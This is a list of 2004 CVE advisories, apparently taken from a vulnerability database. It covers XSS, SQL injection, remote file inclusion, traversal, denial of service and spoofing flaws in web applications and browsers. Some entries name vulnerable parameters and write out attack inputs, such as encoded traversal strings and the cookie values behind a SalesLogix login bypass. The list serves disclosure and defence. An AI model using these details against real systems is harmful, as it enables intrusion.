[CVE-2004-1659] Cross-site scripting (XSS) vulnerability in index.php in CuteNews 1.3.6 and earlier allows remote attackers with Administrator, Editor, Journalist or Commenter privileges to inject arbitrary web script or HTML via the mod parameter.
[CVE-2004-1657] Cross-site scripting (XSS) vulnerability in the Activity and Events Viewer for Newtelligence DasBlog allows remote attackers to inject arbitrary web script or HTML via the (1) User Agent or (2) Referrer HTTP headers.
[CVE-2004-1655] Cross-site scripting (XSS) vulnerability in phpWebsite 0.9.3-4 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) CM_pid parameter in the comments module or (2) the subject or message fields in the notes module.
[CVE-2004-1654] SQL injection vulnerability in the calendar module in phpWebsite 0.9.3-4 and earlier allows remote attackers to execute arbitrary SQL commands via cal_template.
[CVE-2004-1651] Multiple cross-site scripting (XSS) vulnerabilities in the registration page in phpScheduleIt 1.0.0 RC1 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Lastname fields during new user registration, or (3) the Schedule Name field.
[CVE-2004-1648] Cross-site scripting (XSS) vulnerability in (1) index.asp, (2) ChangePassword.asp, (3) users_list.asp, (4) and users_add.asp in Password Protect allows remote attackers to inject arbitrary web script or HTML via the ShowMsg parameter.
[CVE-2004-1645] Cross-site scripting (XSS) vulnerability in Xedus 1.0 allows remote attackers to execute arbitrary web script or HTML via the (1) username parameter to test.x, (2) username parameter to TestServer.x, or (3) param parameter to testgetrequest.x.
[CVE-2004-1640] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 0.94 and 1.0 allow remote attackers to execute arbitrary web script and HTML via the (1) terme parameter to search.php or (2) letter parameter to letter.php.
[CVE-2004-1637] The Hawking Technologies HAR11A modem/router allows remote attackers to obtain sensitive information by connecting to port 254, which displays a management interface and information on established connections.
[CVE-2004-1632] Cross-site scripting (XSS) vulnerability in wiki.php in MoniWiki 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the arguments to wiki.php.
[CVE-2004-1630] Cross-site scripting (XSS) vulnerability in the login form in Open WorkFlow Engine (OpenWFE) 1.4.x allows remote attackers to execute arbitrary web script or HTML via the url parameter.
[CVE-2004-1624] Carbon Copy 6.0.5257 does not drop system privileges when opening external programs through the help topic interface, which allows local users to gain privileges via (1) the help topic interface in CCW32.exe, which launches Notepad, or (2) the help button in the Carbon Copy Scheduler (CCSched.exe).
[CVE-2004-1621] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in IBM Lotus Notes R6 and Domino R6, and possibly earlier versions, allows remote attackers to execute arbitrary web script or HTML via square brackets at the beginning and end of (1) computed for display, (2) computed when composed, or (3) computed text element fields. NOTE: the vendor has disputed this issue, saying that it is not a problem with Notes/Domino itself, but with the applications that do not properly handle this feature.
[CVE-2004-1617] Lynx, lynx-ssl, and lynx-cur before 2.8.6dev.8 allow remote attackers to cause a denial of service (infinite loop) via a web page or HTML email that contains invalid HTML including (1) a TEXTAREA tag with a large COLS value and (2) a large tag name in an element that is not terminated, as demonstrated by mangleme. NOTE: a followup suggests that the relevant trigger for this issue is the large COLS value.
[CVE-2004-1616] Links allows remote attackers to cause a denial of service (memory consumption) via a web page or HTML email that contains a table with a td element and a large rowspan value, as demonstrated by mangleme.
[CVE-2004-1615] Opera allows remote attackers to cause a denial of service (invalid memory reference and application crash) via a web page or HTML email that contains a TBODY tag with a large COL SPAN value, as demonstrated by mangleme.
[CVE-2004-1613] Mozilla allows remote attackers to cause a denial of service (application crash from null dereference or infinite loop) via a web page that contains a (1) TEXTAREA, (2) INPUT, (3) FRAMESET or (4) IMG tag followed by a null character and some trailing characters, as demonstrated by mangleme.
[CVE-2004-1607] slxweb.dll in SalesLogix 6.1 allows remote attackers to obtain sensitive information via a (1) Library or (2) Attachment request with an invalid file parameter, which reveals the path in an error message.
[CVE-2004-1606] slxweb.dll in SalesLogix 6.1 allows remote attackers to cause a denial service (application crash) via an invalid HTTP request, which might also leak sensitive information in the ErrorLogMsg cookie.
[CVE-2004-1605] SalesLogix 6.1 allows remote attackers to bypass authentication by modifying the slxweb cookie to set user=Admin, teams=ADMIN!, and usertype=Administrator.
[CVE-2004-1599] Cross-site scripting (XSS) vulnerability in index.php in CoolPHP 1.0-stable allows remote attackers to execute arbitrary web script or HTML via the (1) query or (2) nick parameters.
[CVE-2004-1594] Cross-site scripting (XSS) vulnerability in FuseTalk 4.0 allows remote attackers to execute arbitrary web script via an img src tag.
[CVE-2004-1593] Cross-site scripting (XSS) vulnerability in render.UserLayoutRootNode.uP in SCT Campus Pipeline allows remote attackers to inject arbitrary web script or HTML via the utf parameter.
[CVE-2004-1592] PHP remote file inclusion vulnerability in index.php in ocPortal 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the req_path parameter to reference a URL on a remote web server that contains a malicious funcs.php script.
[CVE-2004-1589] Cross-site scripting (XSS) vulnerability in GoSmart Message Board allows remote attackers to inject arbitrary web script or HTML via the (1) Category parameter to Forum.asp or (2) MainMessageID parameter to ReplyToQuestion.asp.
[CVE-2004-1582] PHP remote file inclusion vulnerability in BlackBoard 1.5.1 allows remote attackers to execute arbitrary PHP code by modifying the libpath parameter (incorrectly called "libpach") to reference a URL on a remote web server that contains _more.php, as demonstrated using checkdb.inc.php.
[CVE-2004-1578] Cross-site scripting (XSS) vulnerability in index.php in Invision Power Board 2.0.0 allows remote attackers to execute arbitrary web script or HTML via the Referer field in the HTTP header.
[CVE-2004-1566] Cross-site scripting (XSS) vulnerability in index.php in Silent Storm Portal 2.1 and 2.2 allows remote attackers to execute arbitrary web script or HTML via the module parameter.
[CVE-2004-1563] Multiple cross-site scripting (XSS) vulnerabilities in w-Agora 4.1.6a allow remote attackers to execute arbitrary web script or HTML via the (1) thread parameter to download_thread.php, (2) loginuser parameter to login.php, or (3) userid parameter to forgot_password.php.
[CVE-2004-1559] Multiple cross-site scripting (XSS) vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) redirect_to, text, popupurl, or popuptitle parameters to wp-login.php, (2) redirect_url parameter to admin-header.php, (3) popuptitle, popupurl, content, or post_title parameters to bookmarklet.php, (4) cat_ID parameter to categories.php, (5) s parameter to edit.php, or (6) s or mode parameter to edit-comments.php.
[CVE-2004-1557] MyWebServer 1.0.3 allows remote attackers to bypass authentication, modify configuration, and read arbitrary files via a direct HTTP request to (1) /admin or (2) ServerProperties.html.
[CVE-2004-1556] MyWebServer 1.0.3 allows remote attackers to cause a denial of service (application crash) via a large number of connections within a short time.
[CVE-2004-1554] PHP remote file inclusion vulnerability in livre_include.php in @lex Guestbook allows remote attackers to execute arbitrary PHP code by modifying the chem_absolu parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-1553] SQL injection vulnerability in aspWebAlbum allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the cat parameter to album.asp. NOTE: it was later reported that vector 1 affects aspWebAlbum 3.2, and the vector involves the txtUserName parameter in a processlogin action to album.asp, as reachable from the login action.
[CVE-2004-1552] SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp.
[CVE-2004-1551] Cross-site scripting (XSS) vulnerability in the (1) email or (2) file modules in paFileDB 3.1 Final allows remote attackers to execute arbitrary web script or HTML via the id parameter.
[CVE-2004-1544] Cross-site scripting (XSS) vulnerability in Search.jsp in JSPWiki 2.1.120-cvs and earlier allows remote attackers to execute arbitrary web script as other users via the query parameter.
[CVE-2004-1543] Directory traversal vulnerability in viewimg.php in KorWeblog 1.6.2-cvs and earlier allows remote attackers to list arbitrary directories via a .. (dot dot) in the path parameter.
[CVE-2004-1537] Cross-site scripting (XSS) vulnerability in popup.php in PHPKIT 1.6.03 through 1.6.1 allows remote attackers to execute arbitrary web script via the img parameter.
[CVE-2004-1535] PHP remote file inclusion vulnerability in admin_cash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-1534] ZoneAlarm and ZoneAlarm Pro before 5.5.062, with ad-blocking enabled, allows remote web sites to cause a denial of service (application instability or system hang) via certain JavaScript.
[CVE-2004-1529] Cross-site scripting (XSS) vulnerability in the Event Calendar module 2.13 for PHP-Nuke allows remote attackers to execute arbitrary web script via the (1) type, (2) day, (3) month, or (4) year parameters in a Preview operation, or (5) event comments.
[CVE-2004-1527] Microsoft Internet Explorer 6.0 SP1 does not properly handle certain character strings in the Path attribute, which can cause it to modify cookies in other domains when the attacker's domain name is within the target's domain name or when wildcard DNS is being used, which allows remote attackers to hijack web sessions.
[CVE-2004-1516] CRLF injection vulnerability in index.php in phpWebSite 0.9.3-4 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via the block_username parameter in the user module.
[CVE-2004-1514] 04WebServer 1.42 allows remote attackers to cause a denial of service (fail to restart properly) via an HTTP request for an MS-DOS device name such as COM2.
[CVE-2004-1513] 04WebServer 1.42 does not adequately filter data that is written to log files, which could allow remote attackers to inject carriage return characters into the log file and spoof log entries.
[CVE-2004-1512] Cross-site scripting (XSS) vulnerability in Response_default.html in 04WebServer 1.42 allows remote attackers to execute arbitrary web script or HTML via script code in the URL, which is not quoted in the resulting default error page.
[CVE-2004-1511] Hotfoon 4.0 does not notify users before opening links in web browsers, which could allow remote attackers to execute arbitrary code via a certain link sent in a chat window.
[CVE-2004-1510] WebCalendar allows remote attackers to gain privileges by modifying critical parameters to (1) view_entry.php or (2) upcoming.php.
[CVE-2004-1509] validate.php in WebCalendar allows remote attackers to gain sensitive information via an invalid encoded_login parameter, which reveals the full path in an error message.
[CVE-2004-1508] init.php in WebCalendar allows remote attackers to execute arbitrary local PHP scripts via the user_inc parameter.
[CVE-2004-1507] CRLF injection vulnerability in login.php in WebCalendar allows remote attackers to inject CRLF sequences via the return_path parameter and perform HTTP Response Splitting attacks to modify expected HTML content from the server.
[CVE-2004-1506] Multiple cross-site scripting (XSS) vulnerabilities in WebCalendar allow remote attackers to inject arbitrary web script via (1) view_entry.php, (2) view_d.php, (3) usersel.php, (4) datesel.php, (5) trailer.php, or (6) styles.php, as demonstrated using img src tags.
[CVE-2004-1502] The Telnet proxy in 602 Lan Suite 2004.0.04.0909 and earlier allows remote attackers to cause a denial of service (socket exhaustion) via a Telnet request to an IP address of the proxy's network interface, which causes a loop.
[CVE-2004-1501] The webmail service in 602 Lan Suite 2004.0.04.0909 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) by sending a POST request with a large Content-Length value, then disconnecting without sending that amount of data.
[CVE-2004-1499] Cross-site scripting (XSS) vulnerability in the compose message form in HELM 3.1.19 and earlier allows remote attackers to execute arbitrary web script or HTML via the Subject field.
[CVE-2004-1497] Web Forums Server 1.6 and 2.0 Power Pack stores passwords in plaintext in the Username.ini file, which allows local users to gain privileges.
[CVE-2004-1496] Directory traversal vulnerability in Web Forums Server 1.6 and 2.0 Power Pack allows remote attackers to read arbitrary files via a URL containing (1) "..\" (dot dot backslash), (2) "../" (dot dot slash), (3) "/%2E%2E%5C" (encoded dot dot backslash), or (4) "%2E%2E%2F" (encoded dot dot slash).
[CVE-2004-1488] wget 1.8.x and 1.9.x does not filter or quote control characters when displaying HTTP responses to the terminal, which may allow remote malicious web servers to inject terminal escape sequences and execute arbitrary code.
[CVE-2004-1487] wget 1.8.x and 1.9.x allows a remote malicious web server to overwrite certain files via a redirection URL containing a ".." that resolves to the IP address of the malicious server, which bypasses wget's filtering for ".." sequences.
[CVE-2004-1477] Cross-site scripting (XSS) vulnerability in the Management Console in JRun 4.0 allows remote attackers to execute arbitrary web script or HTML and possibly hijack a user's session.
[CVE-2004-1472] Symantec Enterprise Firewall/VPN Appliances 100, 200, and 200R running firmware before 1.63 allow remote attackers to cause a denial of service (device freeze) via a fast UDP port scan on the WAN interface.
[CVE-2004-1468] The web mail functionality in Usermin 1.x and Webmin 1.x allows remote attackers to execute arbitrary commands via shell metacharacters in an e-mail message.
[CVE-2004-1467] Multiple cross-site scripting (XSS) vulnerabilities in eGroupWare 1.0.00.003 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) date or search text field in the calendar module, (2) Field parameter, Filter parameter, QField parameter, Start parameter or Search field in the address module, (3) Subject field in the message module or (4) Subject field in the Ticket module.
[CVE-2004-1466] The set_time_limit function in Gallery before 1.4.4_p2 deletes non-image files in a temporary directory every 30 seconds after they have been uploaded using save_photos.php, which allows remote attackers to upload and execute arbitrary scripts before they are deleted, if the temporary directory is under the web root.
[CVE-2004-1443] Cross-site scripting (XSS) vulnerability in the inline MIME viewer in Horde-IMP (Internet Messaging Program) 3.2.4 and earlier, when used with Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via an e-mail message.
[CVE-2004-1442] Cross-site scripting (XSS) vulnerability in the db2www CGI interpreter in IBM Net.Data 7 and 7.2 allows remote attackers to inject arbitrary web script or HTML via a macro filename, which is not properly handled by error messages such as "DTWP001E."
[CVE-2004-1441] Cross-site scripting (XSS) vulnerability in icq.cgi in Board Power 2.04PF allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2004-1436] The Transaction Language 1 (TL1) login interface in Cisco ONS 15327 4.6(0) and 4.6(1) and 15454 and 15454 SDH 4.6(0) and 4.6(1), when a user account is configured with a blank password, allows remote attackers to gain unauthorized access by logging in with a password larger than 10 characters.
[CVE-2004-1427] PHP remote file inclusion vulnerability in main.inc in KorWeblog 1.6.2-cvs and earlier allows remote attackers to execute arbitrary PHP code by modifying the G_PATH parameter to reference a URL on a remote web server that contains the code, as demonstrated in index.php when using .. (dot dot) sequences in the lng parameter to cause main.inc to be loaded.
[CVE-2004-1426] Directory traversal vulnerability in index.php in KorWeblog 1.6.2-cvs and earlier allows remote attackers to read arbitrary files and execute arbitrary PHP files via .. (dot dot) sequences in the lng parameter.
[CVE-2004-1424] Cross-site scripting (XSS) vulnerability in view.php in Moodle 1.4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2004-1421] Multiple PHP remote file inclusion vulnerabilities in (1) step_one.php, (2) step_one_tables.php, and (3) step_two_tables.php in WHM AutoPilot 2.4.6.5 and earlier allow remote attackers to execute arbitrary PHP code by modifying the server_inc parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-1420] Multiple cross-site scripting (XSS) vulnerabilities in header.php in WHM AutoPilot 2.4.6.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) site_title or (2) http_images parameter.
[CVE-2004-1419] PHP remote file inclusion vulnerability in ZeroBoard 4.1pl4 and earlier allows remote attackers to execute arbitrary PHP code by modifying the (1) _zb_path parameter to outlogin.php or (2) dir parameter to write.php to reference a URL on a remote web server that contains the code.
[CVE-2004-1418] Cross-site scripting (XSS) vulnerability in WPKontakt 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via an e-mail address, which is not quoted when a parsing error is generated.
[CVE-2004-1417] Cross-site scripting (XSS) vulnerability in login.php in PsychoStats 2.2.4 Beta and earlier allows remote attackers to inject arbitrary web script or HTML via the login parameter.
[CVE-2004-1412] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 2.x allows remote attackers to inject arbitrary web script or HTML via the searchm parameter.
[CVE-2004-1410] Cross-site scripting (XSS) vulnerability in Gadu-Gadu build 155 and earlier allows remote attackers to inject arbitrary web script via a URL, which is echoed in a popup window that displays a parsing error message, a different vulnerability than CVE-2004-1229.
[CVE-2004-1409] Multiple cross-site scripting vulnerabilities in Image Gallery Web Application 0.9.10 allow remote attackers to inject arbitrary web script or HTML.
[CVE-2004-1408] The addImage method for admin.class.php in Image Gallery Web Application 0.9.10 does not properly check filenames, which allows remote attackers to upload and execute arbitrary files.
[CVE-2004-1407] Multiple directory traversal vulnerabilities in singapore Image Gallery Web Application 0.9.10 allow remote attackers to (1) read arbitrary files via the showThumb method for thumb.php, or (2) delete arbitrary files via admin.class.php.
[CVE-2004-1403] PHP remote file inclusion vulnerability in index.php in GNUBoard 3.39 and earlier allows remote attackers to execute arbitrary PHP code by modifying the doc parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-1402] SQL injection vulnerability in iWebNegar allows remote attackers to execute arbitrary SQL commands via (1) the string parameter for index.php, (2) comments.php, or (3) the administrator login page.
[CVE-2004-1397] Cross-site scripting (XSS) vulnerability in UseModWiki 1.0 allows remote attackers to inject arbitrary web script or HTML via an argument to wiki.pl.
[CVE-2004-1389] Unknown vulnerability in the Veritas NetBackup Administrative Assistant interface for NetBackup BusinesServer 3.4, 3.4.1, and 4.5, DataCenter 3.4, 3.4.1, and 4.5, Enterprise Server 5.1, and NetBackup Server 5.0 and 5.1, allows attackers to execute arbitrary commands via the bpjava-susvc process, possibly related to the call-back feature.
[CVE-2004-1385] phpGroupWare 0.9.16.003 and earlier allows remote attackers to gain sensitive information via (1) unexpected characters in the session ID such as shell metacharacters, (2) an invalid appname parameter to preferences.php or (3) an invalid menuaction parameter to index.php, which reveals the web server path in an error message.
[CVE-2004-1384] Multiple cross-site scripting (XSS) vulnerabilities in phpGroupWare 0.9.16.003 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) kp3, (2) type, (3) msg, (4) forum_id, (5) pos, (6) cats_app, (7) cat_id, (8) msgball[msgnum], (9) fldball[acctnum] parameters to index.php or (10) ticket_id to viewticket_details.php.
[CVE-2004-1380] Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability."
[CVE-2004-1350] Multiple buffer overflows in Sun Java System Web Proxy Server (formerly Sun ONE Proxy Server) 3.6 through 3.6 SP4 allow remote attackers to execute arbitrary code via unknown vectors, possibly CONNECT requests.
[CVE-2004-1341] Cross-site scripting (XSS) vulnerability in info2www before 1.2.2.9 allows remote attackers to inject arbitrary web script or HTML via the arguments to info2www.
[CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer.
[CVE-2004-1319] The DHTML Edit Control (dhtmled.ocx) allows remote attackers to inject arbitrary web script into other domains by setting a name for a window, opening a child page whose target is the window with the given name, then injecting the script from the parent into the child using execScript, as demonstrated by "AbusiveParent" in Internet Explorer 6.0.2900.2180.
[CVE-2004-1318] Cross-site scripting (XSS) vulnerability in namazu.cgi for Namazu 2.0.13 and earlier allows remote attackers to inject arbitrary HTML and web script via a query that starts with a tab ("%09") character, which prevents the rest of the query from being properly sanitized.
[CVE-2004-1314] Safari 1.x allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability, a different vulnerability than CVE-2004-1122.
[CVE-2004-1303] Buffer overflow in the get function in get.c for Yanf 0.4 allows remote malicious web servers to execute arbitrary code via crafted HTTP responses.
[CVE-2004-1299] Buffer overflow in the get_attr function in html.c for vilistextum 2.6.6 allows remote attackers to execute arbitrary code via a crafted web page.
[CVE-2004-1295] The slip_down function in slip.c for the uml_net program in uml-utilities 20030903, when uml_net is installed setuid root, does not verify whether the calling user has sufficient permission to disable an interface, which allows local users to cause a denial of service (network service disabled).
[CVE-2004-1290] Buffer overflow in the process_moves function in pgn2web.c for pgn2web 0.3 allows remote attackers to execute arbitrary code via a crafted PGN file.
[CVE-2004-1229] Cross-site scripting vulnerability in the parser for Gadu-Gadu allows remote attackers to inject arbitrary web script or HTML via (1) http:// or (2) news:// URLs, a different vulnerability than CVE-2004-1410.
[CVE-2004-1223] The Management Agent in F-Secure Policy Manager 5.11.2810 allows remote attackers to gain sensitive information, such as the absolute path for the web server, via an HTTP request to fsmsh.dll without any parameters.
[CVE-2004-1222] weblibs.pl in WebLibs 1.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the TextFile parameter.
[CVE-2004-1221] Directory traversal vulnerability in weblibs.pl in WebLibs 1.0 allows remote attackers to read arbitrary files via .. sequences in the TextFile parameter.
[CVE-2004-1213] Cross-site scripting (XSS) vulnerability in index.php in Advanced Guestbook 2.3.1, 2.2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the entry parameter.
[CVE-2004-1210] Cross-site scripting (XSS) vulnerability in proxylog.dat in IPCop 1.4.1 and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the (1) url or (2) part variables.
[CVE-2004-1203] parser.php in phpCMS 1.2.1 and earlier, with non-stealth and debug modes enabled, allows remote attackers to gain sensitive information via an invalid file parameter, which reveals the web server's installation path.
[CVE-2004-1202] Cross-site scripting (XSS) vulnerability in parser.php in phpCMS 1.2.1 and earlier, with non-stealth and debug modes enabled, allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2004-1197] Cross-site scripting (XSS) vulnerability in inshop.pl in Insite inShop allows remote attackers to inject arbitrary web script or HTML via the screen parameter.
[CVE-2004-1196] Cross-site scripting (XSS) vulnerability in inmail.pl in Insite Inmail allows remote attackers to inject arbitrary web script or HTML via the acao parameter.
[CVE-2004-1177] Cross-site scripting (XSS) vulnerability in the driver script in mailman before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via a URL, which is not properly escaped in the resulting error page.
[CVE-2004-1169] MaxDB WebTools 7.5.00.18 and earlier allows remote attackers to cause a denial of service (application crash) via an HTTP GET request for a file that does not exist, followed by two carriage returns, which causes a NULL dereference.
[CVE-2004-1168] Stack-based buffer overflow in the WebDav handler in MaxDB WebTools 7.5.00.18 and earlier allows remote attackers to execute arbitrary code via a long Overwrite header.
[CVE-2004-1160] Netscape 7.x to 7.2, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability.
[CVE-2004-1158] Konqueror 3.x up to 3.2.2-6, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window or tab whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability.
[CVE-2004-1157] Opera 7.x up to 7.54, and possibly other versions, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability.
[CVE-2004-1156] Mozilla before 1.7.6, and Firefox before 1.0.1, allows remote attackers to spoof arbitrary web sites by injecting content from one window into a target window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability.
[CVE-2004-1155] Internet Explorer 5.01 through 6 allows remote attackers to spoof arbitrary web sites by injecting content from one window into another window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. NOTE: later research shows that Internet Explorer 7 on Windows XP SP2 is also vulnerable.
[CVE-2004-1146] Multiple cross-site scripting (XSS) vulnerabilities in (1) main.c and (2) login.c for CVSTrac before 1.1.5 allow remote attackers to inject arbitrary HTML and web script.
[CVE-2004-1133] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft W3Who ISAPI (w3who.dll) allow remote attackers to inject arbitrary HTML and web script via (1) HTTP headers such as "Connection" or (2) invalid parameters whose values are echoed in the resulting error message.
[CVE-2004-1130] Cross-site scripting (XSS) vulnerability in admin.asp in CMailServer 5.2 allows remote attackers to execute arbitrary web script or HTML via personal information fields, such as (1) username, (2) name, or (3) comments.
[CVE-2004-1122] Safari 1.x to 1.2.4, and possibly other versions, allows inactive windows to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows, aka the "Dialog Box Spoofing Vulnerability," a different vulnerability than CVE-2004-1314.
[CVE-2004-1106] Cross-site scripting (XSS) vulnerability in Gallery 1.4.4-pl3 and earlier allows remote attackers to execute arbitrary web script or HTML via "specially formed URLs," possibly via the include parameter in index.php.
[CVE-2004-1104] Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty "href" attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL.
[CVE-2004-1103] MailPost 5.1.1sv, and possibly earlier versions, when debug mode is enabled, allows remote attackers to gain sensitive information via the debug parameter, which reveals information such as the path to the web root and the web server version.
[CVE-2004-1101] mailpost.exe in MailPost 5.1.1sv, and possibly earlier versions, allows remote attackers to cause a denial of service (server crash), leak sensitive pathname information in the resulting error message, and execute a cross-site scripting (XSS) attack via an HTTP request that contains a / (backslash) and arbitrary webscript before the requested file, which leaks the pathname and does not quote the script in the resulting Visual Basic error message.
[CVE-2004-1100] Cross-site scripting (XSS) vulnerability in mailpost.exe in MailPost 5.1.1sv, and possibly earlier versions, when debug mode is enabled, allows remote attackers to execute arbitrary web script or HTML via the append parameter.
[CVE-2004-1085] Human Interface Toolbox (HIToolBox) for Apple Mac OS X 10.3.6 allows local users to exit applications via the force-quit key combination, even when the system is running in kiosk mode.
[CVE-2004-1075] Cross-site scripting (XSS) vulnerability in standard_error_message.dtml for Zwiki after 0.10.0rc1 to 0.36.2 allows remote attackers to inject arbitrary HTML and web script via a malformed URL, which is not properly cleansed when generating an error message.
[CVE-2004-1063] PHP 4.x to 4.3.9, and PHP 5.x to 5.0.2, when running in safe mode on a multithreaded Unix webserver, allows local users to bypass safe_mode_exec_dir restrictions and execute commands outside of the intended safe_mode_exec_dir via shell metacharacters in the current directory name. NOTE: this issue was originally REJECTed by its CNA before publication, but that decision is in active dispute. This candidate may change significantly in the future as a result of further discussion.
[CVE-2004-1062] Multiple cross-site scripting (XSS) vulnerabilities in ViewCVS 0.9.2 allow remote attackers to inject arbitrary HTML and web script via certain error messages.
[CVE-2004-1061] Cross-site scripting (XSS) vulnerability in Bugzilla before 2.18, including 2.16.x before 2.16.11, allows remote attackers to inject arbitrary HTML and web script via forced error messages, as demonstrated using the action parameter.
[CVE-2004-1059] Multiple cross-site scripting (XSS) vulnerabilities in mnoGoSearch 3.2.26 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) next and (2) prev result search pages, and the (3) extended and (4) simple search forms.
[CVE-2004-1055] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PmaAbsoluteUri parameter, (2) the zero_rows parameter in read_dump.php, (3) the confirm form, or (4) an error message generated by the internal phpMyAdmin parser.
[CVE-2004-1036] Cross-site scripting (XSS) vulnerability in the decoding of encoded text in certain headers in mime.php for SquirrelMail 1.4.3a and earlier, and 1.5.1-cvs before 23rd October 2004, allows remote attackers to execute arbitrary web script or HTML.
[CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
[CVE-2004-0931] MySQL MaxDB before 7.5.00.18 allows remote attackers to cause a denial of service (crash) via an HTTP request to webdbm with high ASCII values in the Server field, which triggers an assert error in the IsAscii7 function.
[CVE-2004-0918] The asn_parse_header function (asn1.c) in the SNMP module for Squid Web Proxy Cache before 2.4.STABLE7 allows remote attackers to cause a denial of service (server restart) via certain SNMP packets with negative length fields that trigger a memory allocation error.
[CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571.
[CVE-2004-0893] The Local Procedure Call (LPC) interface of the Windows Kernel for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the lengths of messages sent to the LPC port, which allows local users to gain privileges, aka "Windows Kernel Vulnerability."
[CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results.
[CVE-2004-0875] Multiple cross-site scripting (XSS) vulnerabilities in Phpgroupware (aka webdistro) 0.9.16.002 and earlier allow remote attackers to insert arbitrary HTML or web script, as demonstrated with a request to the wiki module.
[CVE-2004-0867] Mozilla Firefox 0.9.2 allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk, and .sch.uk, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session. NOTE: it was later reported that 2.x is also affected.
[CVE-2004-0866] Internet Explorer 6.0 allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk, and .sch.uk, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session.
[CVE-2004-0845] Internet Explorer 5.01, 5.5, and 6 does not properly cache SSL content, which allows remote attackers to obtain information or spoof content via a web site with the same host name as the target web site, whose content is cached and reused when the user visits the target web site.
[CVE-2004-0844] Internet Explorer 6 on Double Byte Character Set (DBCS) systems allows remote attackers to alter displayed address bars and spoof web pages via a URL containing special characters, facilitating phishing attacks, aka the "Address Bar Spoofing on Double Byte Character Set Systems Vulnerability."
[CVE-2004-0843] Internet Explorer 5.5 and 6 does not properly handle plug-in navigation, which allows remote attackers to alter displayed address bars and thereby spoof web pages, facilitating phishing attacks, aka the "Plug-in Navigation Address Bar Spoofing Vulnerability."
[CVE-2004-0839] Internet Explorer in Windows XP SP2, and other versions including 5.01 and 5.5, allows remote attackers to install arbitrary programs via a web page that uses certain styles and the AnchorClick behavior, popup windows, and drag-and-drop capabilities to drop the program in the local startup folder, as demonstrated by "wottapoop.html".
